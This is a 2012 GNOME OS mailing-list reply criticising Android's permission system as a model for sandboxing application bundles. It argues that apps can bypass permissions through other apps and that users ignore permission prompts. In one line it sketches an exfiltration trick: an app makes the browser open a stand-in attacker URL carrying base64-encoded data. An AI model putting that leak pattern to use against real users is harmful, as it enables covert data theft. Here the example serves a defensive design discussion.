Re: Application bundles in Gnome OS
- From: Colin Walters <walters verbum org>
- To: Elad Alfassa <elad fedoraproject org>
- Cc: gnome-os-list gnome org
- Subject: Re: Application bundles in Gnome OS
- Date: Wed, 19 Sep 2012 10:25:18 -0400

On Wed, 2012-09-19 at 17:17 +0300, Elad Alfassa wrote:

> Regarding sandboxing, have you considered a permission manifest for
> each application like Android has?

The Android permission system is basically bullshit from both a
technical *and* user experience standpoint.

The reason it's bullshit technically is twofold:

1) Applications can communicate with each other without any permissions
   at all - so if for example you install some "Secure Notes" app that
   in theory doesn't have Internet access, in reality it can simply
   ask the browser to open http://malware.com/?data=base64here

2) The system has a huge attack surface, and it's really easy for
   capabilities to leak:
   http://news.softpedia.com/news/Android-Security-Model-Allows-Capability-Leaks-238545.shtml

The reason it's bullshit from a user experience standpoint is because no
one reads that stuff - they just press OK.

See also:
http://robert.ocallahan.org/2011/06/permissions-for-web-applications_30.html

Now parts of the security model, like how each application is in theory a
separate security domain (allocated separate uids) etc., are quite
interesting.

But the permissions system is just wasting time for users installing
apps.